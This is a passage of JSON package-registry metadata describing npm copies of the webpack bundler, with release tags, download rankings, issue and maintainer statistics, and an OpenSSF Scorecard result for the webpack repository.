9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T14:34:57.264Z","dependent_packages_count":1,"downloads":15,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":3.361882010621939,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08354704634799201,"forks_count":0.5274268128286366,"average":9.104956482821024},"purl":"pkg:npm/%40jdxcode/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@jdxcode/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@jdxcode/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@jdxcode/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jdxcode%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jdxcode%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jdxcode%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jdxcode%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jdxcode%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jdxcode%2Fwebpack/codemeta","maintainers":[{"uuid":"dickeyxxx","login":"dickeyxxx","name":null,"email":"npm@jdx.dev","url":null,"packages_count":241,"html_url":"https://www.npmjs.com/~dickeyxxx","role":null,"created_at":"2022-11-20T17:50:47.514Z","updated_at":"2022-11-20T17:50:47.514Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/dickeyxxx/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2616144,"name":"zb-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2019-10-14T07:16:11.939Z","latest_release_published_at":"2019-10-14T07:16:11.939Z","latest_release_number":"4.41.1","last_synced_at":"2026-09-03T00:17:39.377Z","created_at":"2022-04-10T04:19:38.931Z","updated_at":"2026-09-03T00:17:39.377Z","registry_url":"https://www.npmjs.com/package/zb-webpack","install_command":"npm install zb-webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.41.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: 